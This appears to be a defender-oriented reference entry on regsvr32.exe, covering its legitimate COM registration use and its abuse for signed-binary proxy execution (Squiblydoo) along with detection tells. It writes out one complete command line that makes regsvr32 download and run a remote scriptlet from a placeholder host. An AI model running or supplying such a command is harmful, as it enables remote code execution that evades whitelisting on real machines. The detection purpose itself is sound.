regsvr32.exe

regsvr32.exe registers a COM server by loading the DLL and calling its exported DllRegisterServer function, which writes the component's registry entries. /u unregisters by calling DllUnregisterServer, and /s runs silently without the usual dialog. The genuine binary lives at C:\Windows\System32\regsvr32.exe, with a 32-bit copy under SysWOW64. Legitimately it appears during software installs and updates, almost always parented by an installer.

It has a second registration path through /i, which calls the DLL's DllInstall function and can pass it a string argument. Paired with the system's COM scriptlet DLL (scrobj.dll), that argument can even be a URL pointing at a script component. Like rundll32.exe, regsvr32 only ever does what its command line names: the DLL on the line and the function it exports.

Outside of software installation, regsvr32 runs rarely and briefly. Its parent and command line are what give each instance meaning.

regsvr32.exe is a classic proxy-execution tool (T1218.010), best known for the Squiblydoo technique. A command line like regsvr32 /s /n /u /i:https://host/file.sct scrobj.dll makes the signed binary download a remote COM scriptlet and run the JScript or VBScript inside it through DllInstall, with no admin rights and nothing written to disk (T1059.007). The /i: URL paired with scrobj.dll is the signature, and the remote fetch shows up as network activity from a process that normally makes none (T1105).

Even without scriptlets, regsvr32 will load and execute any DLL it is pointed at, calling that DLL's DllRegisterServer or DllInstall. A malicious DLL registered this way runs its code under a trusted, Microsoft-signed process, so path and signature checks pass. The tell is a DLL loaded from a user-writable directory or a parent that has no reason to be installing software.